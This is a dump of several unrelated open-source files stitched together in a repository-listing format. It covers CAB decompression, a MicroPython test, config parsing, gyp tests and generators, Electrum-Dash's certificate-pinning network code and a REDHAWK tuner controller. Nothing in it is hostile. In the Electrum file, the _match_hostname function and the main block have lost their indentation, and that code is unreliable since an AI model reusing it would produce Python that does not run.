            self.readfiledata()

    def readfiledata(self):
        """Decompress every folder and attach each file's payload bytes
        as file_.data. Sets self.filedata_read on success."""

        def listfiles():
            """
            will yield metadata for all files that are contained in this cab,
            in the exact order in which their data is contained in the
            uncompressed folder(s).
            """
            for f in sorted(self.files.values(),
                            key=lambda f: (f.folderid, f.pos)):
                yield f

            # a "None" file, so files.current stays valid after the last one
            yield Namespace(folderid=None)

        # files.current is the currently returned file
        # files.next() seeks the next file
        files = IterCache(listfiles())

        for folderid, folder in enumerate(self.folders):
            buf = ByteQueue()

            def decomp_write(data):
                # callback invoked by the decompressor with plaintext chunks
                buf.append(data)

                # check whether buf contains complete files
                while True:
                    if folderid != files.current.folderid:
                        # there are no more files in this folder
                        break

                    if files.current.pos > buf.pos:
                        # the current file does _not_ begin at the start of
                        # the buffer; there are some garbage bytes!
                        discard = min(len(buf), files.current.pos - buf.pos)
                        # bugfix: ByteQueue has no pop(); popleft() is the
                        # method that drops bytes from the front
                        buf.popleft(discard)
                        print("warning: discarding %d bytes in folder %d!"
                              % (discard, folderid))

                    if files.current.pos < buf.pos:
                        # the beginning of the file is missing
                        raise Exception("File start position invalid: %s"
                                        % (files.current.name))

                    if len(buf) < files.current.size:
                        # the file data is not yet fully loaded into buf.
                        break

                    files.current.data = buf.popleft(files.current.size)
                    files.next()

                # the callback API wants us to return len(data)
                return len(data)

            if folder.comptype == 'LZX':
                lzxd.decompress(folder.comp_window_size,
                                folder.uncompressed_size,
                                folder.pseudofile.read,
                                decomp_write)
            else:
                raise Exception("Unsupported folder compression: " +
                                folder.comptype)

            if buf:
                # bugfix: referenced the undefined name `currentbuf`
                print("warning: the last %d bytes of folder %d are being "
                      "discarded!" % (len(buf), folderid))

            if files.current.folderid == folderid:
                # bugfix: referenced undefined names meta/fileno
                raise Exception(
                    "Unexpected end of folder %d while reading data for %s"
                    % (folderid, files.current.name))

        if files.current.folderid is not None:
            raise Exception("Missing folder: %d" % (files.current.folderid))

        self.filedata_read = True

    def open(self, name, mode='rb', ignorecase=True):
        """Return a file-like object for the archive member `name`.

        mode       -- must be 'rb'; cab members are read-only binary
        ignorecase -- match the name case-insensitively (default True)
        """
        if mode != 'rb':
            # bugfix: message typo ("most" -> "must")
            raise Exception("mode must be 'rb'")

        if ignorecase:
            f = self.files_lowercase[name.lower()]
        else:
            f = self.files[name]

        # decompress lazily on first access
        if not self.filedata_read:
            self.readfiledata()

        return BlobPseudoFile(f.data)
class BlobPseudoFile:
    """Minimal read-only file-like wrapper around an in-memory blob.

    Supports tell/seek/read with the usual whence semantics.
    """

    def __init__(self, blob):
        self.blob = blob
        self.pos = 0

    def tell(self):
        return self.pos

    def seek(self, offset, fromwhat=0):
        """Seek like io: fromwhat 0=absolute, 1=relative, 2=from end.
        Returns the new position (unchanged for an unknown whence)."""
        if fromwhat == 0:
            self.pos = offset + 0
        elif fromwhat == 1:
            self.pos = offset + self.pos
        elif fromwhat == 2:
            self.pos = offset + len(self.blob)
        return self.pos

    def read(self, size=-1):
        """Read up to `size` bytes (all remaining bytes if negative)."""
        if size < 0:
            size = float("+inf")
        size = max(0, min(size, len(self.blob) - self.pos))
        data = self.blob[self.pos:self.pos + size]
        # bugfix: the position advance used to sit AFTER the return
        # statement and was therefore never executed, so consecutive
        # reads all returned the same bytes
        self.pos += size
        return data
class FolderPseudoFile:
    """Read-only file-like view over a folder's CFDATA payload bytes.

    Presents the concatenation of all datablock payloads as a single
    contiguous stream, translating read() into read_at() calls on the
    underlying cab file.
    """

    def __init__(self, folder, f):
        self.f = f
        self.pos = 0
        self.size = 0
        self.datablockanchors = []  # logical start offset of each block
        self.datablocks = []        # (physical start, size) per block
        for block in folder.datablocks:
            self.datablockanchors.append(self.size)
            self.datablocks.append((block.ab_start, block.ab_size))
            self.size += block.ab_size

    def close(self):
        del self.f

    def current_datablock(self):
        """Index of the datablock containing the current position."""
        return bisect(self.datablockanchors, self.pos) - 1

    def datablock_remaining(self, idx):
        """Bytes left between the current position and block idx's end."""
        return max(0, self.datablock_size(idx) - self.pos_in_datablock(idx))

    def datablock_size(self, idx):
        return self.datablocks[idx][1]

    def datablock_physicalstart(self, idx):
        return self.datablocks[idx][0]

    def pos_in_datablock(self, idx):
        """Offset of the current position inside datablock idx."""
        return self.pos - self.datablockanchors[idx]

    def tell(self):
        return self.pos

    def seek(self, offset, fromwhat=0):
        """Seek like io: fromwhat 0=absolute, 1=relative, 2=from end.
        Returns the (possibly unchanged) position."""
        if fromwhat == 0:
            base = 0
        elif fromwhat == 1:
            base = self.pos
        elif fromwhat == 2:
            base = self.size
        else:
            # unknown whence: position stays as it is
            return self.pos
        self.pos = offset + base
        return self.pos

    def read(self, size=-1):
        """Read up to `size` bytes (all remaining bytes if negative),
        stitching together data from consecutive datablocks."""
        if size < 0:
            size = float("+inf")

        idx = self.current_datablock()
        parts = []
        while True:
            # take what the current datablock still offers
            step = min(self.datablock_remaining(idx), size)
            parts.append(read_at(
                self.f,
                self.datablock_physicalstart(idx) + self.pos_in_datablock(idx),
                step))
            self.pos += step
            size -= step
            if size == 0 or self.pos >= self.size:
                # request satisfied, or EOF
                return b"".join(parts)
            # move on to the next datablock
            idx += 1
|
martinribelotta/micropython | refs/heads/master | tests/basics/closure_defargs.py | 118 | # test closure with default args
def f():
    """Exercise a closure whose inner function has default arguments."""
    captured = 1

    def inner(b=10, c=20):
        # `captured` comes from the enclosing scope; b and c default
        print(captured + b + c)

    inner()          # 31: all defaults
    inner(2)         # 23: override b only
    inner(2, 3)      # 6:  override both
print(f())  # f() returns None implicitly; "None" is part of the expected output
|
synergeticsedx/deployment-wipro | refs/heads/oxa/master.fic | common/djangoapps/util/config_parse.py | 197 | """
Helper functions for configuration parsing
"""
import collections
def convert_tokens(tokens):
    """
    This function is called on the token
    dictionary that is imported from a yaml file.

    It returns a new structure in which every string equal to 'None'
    has been converted to a literal None (working around an Ansible
    bug), recursing through nested dicts and iterables.
    """
    if tokens == 'None':
        return None
    # strings and non-iterable scalars pass through unchanged
    is_leaf = (isinstance(tokens, basestring)
               or not isinstance(tokens, collections.Iterable))
    if is_leaf:
        return tokens
    if isinstance(tokens, dict):
        return dict(
            (convert_tokens(k), convert_tokens(v))
            for k, v in tokens.items()
        )
    return [convert_tokens(v) for v in tokens]
|
farhaadila/django-cms | refs/heads/develop | cms/test_utils/project/mti_pluginapp/migrations/__init__.py | 12133432 | |
seann1/portfolio5 | refs/heads/master | .meteor/dev_bundle/lib/node_modules/npm/node_modules/node-gyp/gyp/pylib/gyp/generator/ninja_test.py | 1843 | #!/usr/bin/env python
# Copyright (c) 2012 Google Inc. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
""" Unit tests for the ninja.py file. """
import gyp.generator.ninja as ninja
import unittest
import StringIO
import sys
import TestCommon
class TestPrefixesAndSuffixes(unittest.TestCase):
  """Checks that NinjaWriter computes platform-correct binary names."""

  def test_BinaryNamesWindows(self):
    """Windows targets must get .exe/.dll/.lib suffixes."""
    # These cannot run on non-Windows as they require a VS installation to
    # correctly handle variable expansion.
    if sys.platform.startswith('win'):
      writer = ninja.NinjaWriter('foo', 'wee', '.', '.', 'build.ninja', '.',
                                 'build.ninja', 'win')
      spec = { 'target_name': 'wee' }
      self.assertTrue(writer.ComputeOutputFileName(spec, 'executable').
          endswith('.exe'))
      self.assertTrue(writer.ComputeOutputFileName(spec, 'shared_library').
          endswith('.dll'))
      self.assertTrue(writer.ComputeOutputFileName(spec, 'static_library').
          endswith('.lib'))

  def test_BinaryNamesLinux(self):
    """Linux targets get no suffix for executables and lib*.so / lib*.a
    names for shared/static libraries."""
    writer = ninja.NinjaWriter('foo', 'wee', '.', '.', 'build.ninja', '.',
                               'build.ninja', 'linux')
    spec = { 'target_name': 'wee' }
    self.assertTrue('.' not in writer.ComputeOutputFileName(spec,
                                                            'executable'))
    self.assertTrue(writer.ComputeOutputFileName(spec, 'shared_library').
        startswith('lib'))
    self.assertTrue(writer.ComputeOutputFileName(spec, 'static_library').
        startswith('lib'))
    self.assertTrue(writer.ComputeOutputFileName(spec, 'shared_library').
        endswith('.so'))
    self.assertTrue(writer.ComputeOutputFileName(spec, 'static_library').
        endswith('.a'))
if __name__ == '__main__':
  # allow running this test file directly
  unittest.main()
|
dashpay/electrum-dash | refs/heads/master | lib/interface.py | 7 | #!/usr/bin/env python
#
# Electrum - lightweight Bitcoin client
# Copyright (C) 2011 thomasv@gitorious
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import os
import re
import socket
import ssl
import sys
import threading
import time
import traceback
import requests
ca_path = requests.certs.where()
import util
import x509
import pem
def Connection(server, queue, config_path):
    """Makes asynchronous connections to a remote electrum server.
    Returns the running thread that is making the connection.

    Once the thread has connected, it finishes, placing a tuple on the
    queue of the form (server, socket), where socket is None if
    connection failed.

    `server` is a "host:port:protocol" string; protocol 't' is plain
    TCP and 's' is SSL.
    """
    host, port, protocol = server.split(':')
    # BUG FIX: the original test was `not protocol in 'st'`, which is a
    # substring check -- it wrongly accepted '' and 'st' as protocols.
    if protocol not in ('s', 't'):
        raise Exception('Unknown protocol: %s' % protocol)
    c = TcpConnection(server, queue, config_path)
    c.start()
    return c
class TcpConnection(threading.Thread, util.PrintError):
    """Daemon thread that opens a TCP (and optionally SSL) connection.

    On completion run() puts (server, socket) on `queue`.  For SSL
    servers whose certificate is not signed by a known CA, the server
    certificate is pinned on first use under <config_path>/certs/<host>
    (trust-on-first-use).
    NOTE(review): this is Python 2 code (`except X, e` syntax,
    dict.has_key) -- it will not parse under Python 3.
    """

    def __init__(self, server, queue, config_path):
        threading.Thread.__init__(self)
        self.config_path = config_path
        self.queue = queue
        self.server = server
        # server is "host:port:protocol"; protocol 's' selects SSL.
        self.host, self.port, self.protocol = self.server.split(':')
        self.host = str(self.host)
        self.port = int(self.port)
        self.use_ssl = (self.protocol == 's')
        self.daemon = True

    def diagnostic_name(self):
        # Used by util.PrintError to prefix log lines with the host name.
        return self.host

    def check_host_name(self, peercert, name):
        """Simple certificate/host name checker.  Returns True if the
        certificate matches, False otherwise.  Does not support
        wildcards."""
        # Check that the peer has supplied a certificate.
        # None/{} is not acceptable.
        if not peercert:
            return False
        if peercert.has_key("subjectAltName"):
            for typ, val in peercert["subjectAltName"]:
                if typ == "DNS" and val == name:
                    return True
        else:
            # Only check the subject DN if there is no subject alternative
            # name.
            cn = None
            for attr, val in peercert["subject"]:
                # Use most-specific (last) commonName attribute.
                if attr == "commonName":
                    cn = val
            if cn is not None:
                return cn == name
        return False

    def get_simple_socket(self):
        """Resolve the host and return a connected plain TCP socket,
        or None if resolution/connection failed."""
        try:
            l = socket.getaddrinfo(self.host, self.port, socket.AF_UNSPEC, socket.SOCK_STREAM)
        except socket.gaierror:
            self.print_error("cannot resolve hostname")
            return
        for res in l:
            try:
                s = socket.socket(res[0], socket.SOCK_STREAM)
                s.settimeout(10)
                s.connect(res[4])
                # Shorter timeout once connected; keepalive for the
                # long-lived server link.
                s.settimeout(2)
                s.setsockopt(socket.SOL_SOCKET, socket.SO_KEEPALIVE, 1)
                return s
            except BaseException as e:
                continue
        else:
            # for/else: reached only when every candidate address failed.
            self.print_error("failed to connect", str(e))

    def get_socket(self):
        """Return a connected socket (SSL-wrapped when use_ssl), or None.

        SSL flow: first try CA validation; if that fails, fetch the
        server certificate and pin it (saved to cert_path on success).
        A previously pinned cert is required to match on later connects.
        """
        if self.use_ssl:
            cert_path = os.path.join(self.config_path, 'certs', self.host)
            if not os.path.exists(cert_path):
                is_new = True
                s = self.get_simple_socket()
                if s is None:
                    return
                # try with CA first
                try:
                    s = ssl.wrap_socket(s, ssl_version=ssl.PROTOCOL_SSLv23, cert_reqs=ssl.CERT_REQUIRED, ca_certs=ca_path, do_handshake_on_connect=True)
                except ssl.SSLError, e:
                    s = None
                if s and self.check_host_name(s.getpeercert(), self.host):
                    self.print_error("SSL certificate signed by CA")
                    return s
                # get server certificate.
                # Do not use ssl.get_server_certificate because it does not work with proxy
                s = self.get_simple_socket()
                if s is None:
                    return
                try:
                    # CERT_NONE: we only want the peer's cert bytes here.
                    s = ssl.wrap_socket(s, ssl_version=ssl.PROTOCOL_SSLv23, cert_reqs=ssl.CERT_NONE, ca_certs=None)
                except ssl.SSLError, e:
                    self.print_error("SSL error retrieving SSL certificate:", e)
                    return
                dercert = s.getpeercert(True)
                s.close()
                cert = ssl.DER_cert_to_PEM_cert(dercert)
                # workaround android bug
                cert = re.sub("([^\n])-----END CERTIFICATE-----","\\1\n-----END CERTIFICATE-----",cert)
                # Written to a .temp file first; renamed to cert_path only
                # once the pinned handshake below succeeds.
                temporary_path = cert_path + '.temp'
                with open(temporary_path,"w") as f:
                    f.write(cert)
            else:
                is_new = False
        s = self.get_simple_socket()
        if s is None:
            return
        if self.use_ssl:
            try:
                # Validate against the pinned certificate (new or saved).
                s = ssl.wrap_socket(s,
                                    ssl_version=ssl.PROTOCOL_SSLv23,
                                    cert_reqs=ssl.CERT_REQUIRED,
                                    ca_certs= (temporary_path if is_new else cert_path),
                                    do_handshake_on_connect=True)
            except ssl.SSLError, e:
                self.print_error("SSL error:", e)
                # errno 1 is a certificate verification failure; anything
                # else is treated as a transient error.
                if e.errno != 1:
                    return
                if is_new:
                    # Keep the rejected certificate for inspection.
                    rej = cert_path + '.rej'
                    if os.path.exists(rej):
                        os.unlink(rej)
                    os.rename(temporary_path, rej)
                else:
                    # Pinned cert mismatch: distinguish expiry (delete the
                    # pin so it can be refreshed) from a real mismatch.
                    with open(cert_path) as f:
                        cert = f.read()
                    try:
                        b = pem.dePem(cert, 'CERTIFICATE')
                        x = x509.X509(b)
                    except:
                        traceback.print_exc(file=sys.stderr)
                        self.print_error("wrong certificate")
                        return
                    try:
                        x.check_date()
                    except:
                        self.print_error("certificate has expired:", cert_path)
                        os.unlink(cert_path)
                        return
                    self.print_error("wrong certificate")
                return
            except BaseException, e:
                self.print_error(e)
                # errno 104: connection reset by peer.
                if e.errno == 104:
                    return
                traceback.print_exc(file=sys.stderr)
                return
            if is_new:
                self.print_error("saving certificate")
                os.rename(temporary_path, cert_path)
        return s

    def run(self):
        # Always report back on the queue, even when socket is falsy.
        socket = self.get_socket()
        if socket:
            self.print_error("connected")
        self.queue.put((self.server, socket))
class Interface(util.PrintError):
    """The Interface class handles a socket connected to a single remote
    electrum server.  Its exposed API is:

    - Member functions close(), fileno(), get_responses(), has_timed_out(),
      ping_required(), queue_request(), send_requests()
    - Member variable server.

    NOTE(review): Python 2 code (tuple-unpacking lambda, `except X, e`).
    """

    def __init__(self, server, socket):
        # NOTE: the `socket` parameter shadows the module of the same name
        # inside this method only.
        self.server = server
        self.host, _, _ = server.split(':')
        self.socket = socket
        self.pipe = util.SocketPipe(socket)
        self.pipe.set_timeout(0.0) # Don't wait for data
        # Dump network messages. Set at runtime from the console.
        self.debug = False
        self.unsent_requests = []
        self.unanswered_requests = {}
        # Set last ping to zero to ensure immediate ping
        self.last_request = time.time()
        self.last_ping = 0
        self.closed_remotely = False

    def diagnostic_name(self):
        # Used by util.PrintError to prefix log lines.
        return self.host

    def fileno(self):
        # Needed for select
        return self.socket.fileno()

    def close(self):
        # Skip the shutdown handshake if the peer already closed on us.
        if not self.closed_remotely:
            try:
                self.socket.shutdown(socket.SHUT_RDWR)
            except socket.error:
                pass
        self.socket.close()

    def queue_request(self, *args): # method, params, _id
        '''Queue a request, later to be send with send_requests when the
        socket is available for writing.
        '''
        self.request_time = time.time()
        self.unsent_requests.append(args)

    def num_requests(self):
        '''Keep unanswered requests below 100'''
        n = 100 - len(self.unanswered_requests)
        return min(n, len(self.unsent_requests))

    def send_requests(self):
        '''Sends queued requests.  Returns False on failure.'''
        # Python 2 tuple-unpacking lambda: (method, params, id) -> JSON-RPC dict.
        make_dict = lambda (m, p, i): {'method': m, 'params': p, 'id': i}
        n = self.num_requests()
        wire_requests = self.unsent_requests[0:n]
        try:
            self.pipe.send_all(map(make_dict, wire_requests))
        except socket.error, e:
            self.print_error("socket error:", e)
            return False
        # Only drop requests from the queue once they are on the wire.
        self.unsent_requests = self.unsent_requests[n:]
        for request in wire_requests:
            if self.debug:
                self.print_error("-->", request)
            self.unanswered_requests[request[2]] = request
        return True

    def ping_required(self):
        '''Maintains time since last ping.  Returns True if a ping should
        be sent.
        '''
        now = time.time()
        if now - self.last_ping > 60:
            self.last_ping = now
            return True
        return False

    def has_timed_out(self):
        '''Returns True if the interface has timed out.'''
        # Both the oldest outstanding request and the pipe must have been
        # idle for 10 seconds.
        if (self.unanswered_requests and time.time() - self.request_time > 10
            and self.pipe.idle_time() > 10):
            self.print_error("timeout", len(self.unanswered_requests))
            return True
        return False

    def get_responses(self):
        '''Call if there is data available on the socket.  Returns a list of
        (request, response) pairs.  Notifications are singleton
        unsolicited responses presumably as a result of prior
        subscriptions, so request is None and there is no 'id' member.
        Otherwise it is a response, which has an 'id' member and a
        corresponding request.  If the connection was closed remotely
        or the remote server is misbehaving, a (None, None) will appear.
        '''
        responses = []
        while True:
            try:
                response = self.pipe.get()
            except util.timeout:
                break
            if not type(response) is dict:
                # Anything non-dict signals closure or misbehaviour.
                responses.append((None, None))
                if response is None:
                    self.closed_remotely = True
                    self.print_error("connection closed remotely")
                break
            if self.debug:
                self.print_error("<--", response)
            wire_id = response.get('id', None)
            if wire_id is None:  # Notification
                responses.append((None, response))
            else:
                request = self.unanswered_requests.pop(wire_id, None)
                if request:
                    responses.append((request, response))
                else:
                    self.print_error("unknown wire ID", wire_id)
                    responses.append((None, None)) # Signal
                    break
        return responses
def check_cert(host, cert):
    """Parse a PEM certificate and print whether it has expired.

    Emits a short "host/has_expired" report via util.print_msg.  On a
    malformed certificate the traceback is dumped to stdout and nothing
    is printed.
    """
    try:
        b = pem.dePem(cert, 'CERTIFICATE')
        x = x509.X509(b)
    except Exception:
        # Narrowed from a bare `except:` so KeyboardInterrupt/SystemExit
        # still propagate.
        traceback.print_exc(file=sys.stdout)
        return
    try:
        # check_date() raises when the certificate is outside its
        # validity period.
        x.check_date()
        expired = False
    except Exception:
        expired = True
    m = "host: %s\n" % host
    m += "has_expired: %s\n" % expired
    util.print_msg(m)
# Used by tests
def _match_hostname(name, val):
if val == name:
return True
return val.startswith('*.') and name.endswith(val[1:])
def test_certificates():
    """Run check_cert over every pinned certificate under <config>/certs.

    NOTE(review): Python 2 (`print c` statement).
    """
    from simple_config import SimpleConfig
    config = SimpleConfig()
    mydir = os.path.join(config.path, "certs")
    certs = os.listdir(mydir)
    for c in certs:
        # File name == pinned host name.
        print c
        p = os.path.join(mydir,c)
        with open(p) as f:
            cert = f.read()
        check_cert(c, cert)
if __name__ == "__main__":
test_certificates()
|
RedhawkSDR/FrontEndController | refs/heads/master | python/FrontEndController.py | 1 | #!/usr/bin/env python
#
# This file is protected by Copyright. Please refer to the COPYRIGHT file
# distributed with this source distribution.
#
# This file is part of REDHAWK FrontEndController.
#
# REDHAWK FrontEndController is free software: you can redistribute it and/or modify it under
# the terms of the GNU Lesser General Public License as published by the Free
# Software Foundation, either version 3 of the License, or (at your option) any
# later version.
#
# REDHAWK FrontEndController is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
# FOR A PARTICULAR PURPOSE. See the GNU Lesser General Public License for more
# details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with this program. If not, see http://www.gnu.org/licenses/.
#
# AUTO-GENERATED
#
# Source: FrontEndController.spd.xml
from ossie.resource import start_component
import logging
from FrontEndController_base import *
from ossie.utils import redhawk
import frontend
from redhawk.frontendInterfaces import FRONTEND
class FrontEndController_i(FrontEndController_base):
    """
    This component was developed to support the REDHAWK LiveDVD. It also serves to provides a simple
    example of FEI Allocations and connections. It was developed with REDHAWK 1.10.0.
    """
    # Class-level defaults; populated by connectAndTune() at runtime.
    targetComponent=None
    targetDevice=None
    domain = None
    targetComponentPort = None
    targetDevicePort = None
    feiTunerPort = None
    connected = False

    def initialize(self):
        """Register for TuneRequest property changes on top of base init."""
        FrontEndController_base.initialize(self)
        self.addPropertyChangeListener("TuneRequest", self.TuneRequest_changed)

    def start(self):
        """Start the component; connect and allocate the tuner once."""
        FrontEndController_base.start(self)
        if not self.connected:
            self.connectAndTune()

    def stop(self):
        """Deallocate the tuner and disconnect the ports, then stop."""
        self._log.debug("Stop called.")
        try:
            if self.connected:
                self.targetDevice.deallocateCapacity(self.allocationRequest)
                self.targetDevicePort.disconnectPort(self.allocationId)
        except:
            self._log.error("Exception occurred while deallocating and disconnecting.")
        finally:
            # Mark disconnected even if cleanup failed, so a later start()
            # attempts a fresh connection.
            self.connected = False
        FrontEndController_base.stop(self)

    def TuneRequest_changed(self, propid, oldval, newval):
        """Property-change callback: push new frequency/sample-rate to the
        FEI tuner, then read back the actual values into TuneRequest.

        Frequencies/rates in the property are in MHz; the FEI API uses Hz,
        hence the *1e6 / /1e6 conversions.
        """
        self._log.debug("Received Tune Request Change")
        self._log.debug("Currently Connected: " + str(self.connected))
        if self.connected:
            try:
                if (oldval.frequency != newval.frequency):
                    self._log.debug("Trying to set frequency to: " + str(newval.frequency))
                    self.feiTunerPort.setTunerCenterFrequency(self.allocationId, newval.frequency*1e6)
                if (oldval.sampleRate != newval.sampleRate):
                    self._log.debug("Trying to set sample rate to: " + str(newval.sampleRate))
                    self.feiTunerPort.setTunerOutputSampleRate(self.allocationId, newval.sampleRate*1e6)
            except FRONTEND.BadParameterException as ex:
                self._log.error("Bad Parameter Exception Thrown: " + str(ex))
            except FRONTEND.NotSupportedException as ex:
                self._log.error("Not Supported Exception Thrown: " + str(ex))
            except FRONTEND.FrontendException as ex:
                self._log.error("Front End Exception Thrown: " + str(ex))
            except Exception as ex:
                self._log.error("Failed to set property: " + str(ex))
            finally:
                # Reflect what the hardware actually accepted back into the
                # property, regardless of whether the set calls succeeded.
                self.TuneRequest.frequency = self.feiTunerPort.getTunerCenterFrequency(self.allocationId) / 1e6
                self._log.debug("Actual frequency: " + str(self.TuneRequest.frequency))
                self.TuneRequest.sampleRate = self.feiTunerPort.getTunerOutputSampleRate(self.allocationId) / 1e6
                self._log.debug("Actual sample rate: " + str(self.TuneRequest.sampleRate))

    def connectAndTune(self):
        """Locate the target component and FEI device, allocate a tuner and
        connect the device's output port to the component's input port.

        Any missing configuration or lookup failure logs an error and
        stops the component.
        """
        # Lets make sure we have everything we need before continuing.
        if not self.InputComponent.componentName:
            self._log.error("Stopping. Component name must be specified.")
            self.stop()
            return
        if not self.InputComponent.inputPortName:
            self._log.error("Stopping. Component input port name must be specified.")
            self.stop()
            return
        if not self.FEIDevice.deviceName:
            self._log.error("Stopping. Device name must be specified.")
            self.stop()
            return
        if not self.FEIDevice.outputPortName:
            self._log.error("Stopping. Device output port name must be specified.")
            self.stop()
            return
        if not self.FEIDevice.tunerPortName:
            self._log.error("Stopping. Device tuner port name must be specified.")
            self.stop()
            return
        # While the domain port does give us a direct connection to the domain, the
        # API exposed is cleaner from the domain instance returned via the redhawk.attach method.
        try:
            domainname = self.port_DomainManager_out._get_name()
            self.domain = redhawk.attach(domainname)
        except Exception as ex:
            self._log.error("Failed to connect to domain: " + str(ex))
            self.stop()
            return
        if self.domain is None:
            self._log.error("Stopping. Could not connect to domain.")
            self.stop()
            return
        self._log.debug("Searching for the current waveform in the domain")
        waveform = self.findWaveformByComponentInstanceName(self._name)
        if waveform is None:
            self._log.error("Stopping. Could not find the running waveform.")
            self.stop();
            return
        self._log.debug("Searching for the component in the waveform: " + str(waveform.name))
        # Gets the component from the application. The component name can be the name or instantition. ex. DataConverter or DataConveter_3
        # This allows you to use the same component multiple times in a waveform and know for certain which one you are connecting to.
        for comp in waveform.comps:
            if self.InputComponent.componentName in comp._instanceName:
                self.targetComponent = comp
                break
        if self.targetComponent is None:
            self._log.error("Stopping. Could not find the component: " + self.InputComponent.componentName)
            self.stop();
            return
        self._log.debug("Searching device managers for device: " + self.FEIDevice.deviceName)
        self.targetDevice = self.findByDeviceName(self.FEIDevice.deviceName)
        if self.targetDevice is None:
            self._log.error("Stopping. Could not find the device: " + self.FEIDevice.deviceName)
            self.stop()
            return
        # Gets the references to the input and output ports
        self.targetComponentPort = self.targetComponent.getPort(self.InputComponent.inputPortName)
        self.targetDevicePort = self.targetDevice.getPort(self.FEIDevice.outputPortName)
        self.feiTunerPort = self.targetDevice.getPort(self.FEIDevice.tunerPortName)
        if self.targetComponentPort is None:
            self._log.error("Stopping. Could not find the component input port: " + self.InputComponent.inputPortName)
            self.stop()
            return
        if self.targetDevicePort is None:
            self._log.error("Stopping. Could not find the component output port: " + self.FEIDevice.outputPortName)
            self.stop()
            return
        if self.feiTunerPort is None:
            self._log.error("Stopping. Could not find the tuner port: " + self.FEIDevice.tunerPortName)
            self.stop()
            return
        # NOTE(review): self.tunerType and self.allocationId are presumably
        # properties defined on FrontEndController_base -- confirm.
        self.allocationRequest = frontend.createTunerAllocation(
            tuner_type = self.tunerType,
            allocation_id = self.allocationId,
            center_frequency = self.TuneRequest.frequency * 1e6,
            sample_rate = self.TuneRequest.sampleRate * 1e6,
            sample_rate_tolerance = 20.0
        )
        self._log.debug("Performing allocation of FEI Device")
        self._log.debug("Allocation contains: " + str(self.allocationRequest))
        retVal = False
        try:
            retVal = self.targetDevice.allocateCapacity(self.allocationRequest)
        except CF.Device.InvalidCapacity as ex:
            self._log.error("Device has invalid capacity, allocation failed: " + str(ex))
        except CF.Device.InvalidState as ex:
            self._log.error("Device in invalid state, allocation failed: " + str(ex))
        except Exception as ex:
            self._log.error("Exception thrown while allocating: " + str(ex))
        if (retVal is False):
            self._log.error("Allocation failed. Stopping.")
            self.stop()
            return
        self._log.debug("Allocation succeeded!")
        # Makes the actual connection
        self._log.debug("Connecting component and device ports")
        self.targetDevicePort.connectPort(self.targetComponentPort, self.allocationId)
        self.connected = True
        self._log.debug("Starting device and component")
        # Make sure device and component are started
        self.targetDevice.start()
        self.targetComponent.start()

    # This component does no processing so we can just return FINISH so
    # the process method does not get called again.
    def process(self):
        return FINISH

    def findWaveformByComponentInstanceName(self, name):
        """Return the running application containing a component whose
        instance name includes `name`, or None."""
        # Gets a reference to the running application
        for app in self.domain.apps:
            # Find desired application
            for comp in app.comps:
                self._log.trace("Checking if " + name + " is in " + comp._instanceName)
                if name in comp._instanceName:
                    return app
        return None

    def findByDeviceName(self, dev_name):
        """Return the first device (across all device managers) whose
        instance name includes `dev_name`, or None."""
        for devMgr in self.domain.devMgrs:
            for dev in devMgr.devs:
                self._log.trace("Checking if " + dev_name + " is in " + dev._instanceName)
                if dev_name in dev._instanceName:
                    return dev
        return None
if __name__ == '__main__':
    # Standard REDHAWK entry point: hand the component class to the runner.
    logging.getLogger().setLevel(logging.INFO)
    # NOTE(review): this DEBUG message is below the INFO level set above,
    # so it is normally suppressed.
    logging.debug("Starting Component")
    start_component(FrontEndController_i)
|
Whatsit2yaa/vast-tundra-84597 | refs/heads/master | node_modules/npm/node_modules/node-gyp/gyp/pylib/gyp/generator/gypd.py | 1824 | # Copyright (c) 2011 Google Inc. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""gypd output module
This module produces gyp input as its output. Output files are given the
.gypd extension to avoid overwriting the .gyp files that they are generated
from. Internal references to .gyp files (such as those found in
"dependencies" sections) are not adjusted to point to .gypd files instead;
unlike other paths, which are relative to the .gyp or .gypd file, such paths
are relative to the directory from which gyp was run to create the .gypd file.
This generator module is intended to be a sample and a debugging aid, hence
the "d" for "debug" in .gypd. It is useful to inspect the results of the
various merges, expansions, and conditional evaluations performed by gyp
and to see a representation of what would be fed to a generator module.
It's not advisable to rename .gypd files produced by this module to .gyp,
because they will have all merges, expansions, and evaluations already
performed and the relevant constructs not present in the output; paths to
dependencies may be wrong; and various sections that do not belong in .gyp
files such as such as "included_files" and "*_excluded" will be present.
Output will also be stripped of comments. This is not intended to be a
general-purpose gyp pretty-printer; for that, you probably just want to
run "pprint.pprint(eval(open('source.gyp').read()))", which will still strip
comments but won't do all of the other things done to this module's output.
The specific formatting of the output generated by this module is subject
to change.
"""
import gyp.common
import errno
import os
import pprint
# These variables should just be spit back out as variable references.
_generator_identity_variables = [
  'CONFIGURATION_NAME',
  'EXECUTABLE_PREFIX',
  'EXECUTABLE_SUFFIX',
  'INTERMEDIATE_DIR',
  'LIB_DIR',
  'PRODUCT_DIR',
  'RULE_INPUT_ROOT',
  'RULE_INPUT_DIRNAME',
  'RULE_INPUT_EXT',
  'RULE_INPUT_NAME',
  'RULE_INPUT_PATH',
  'SHARED_INTERMEDIATE_DIR',
  'SHARED_LIB_DIR',
  'SHARED_LIB_PREFIX',
  'SHARED_LIB_SUFFIX',
  'STATIC_LIB_PREFIX',
  'STATIC_LIB_SUFFIX',
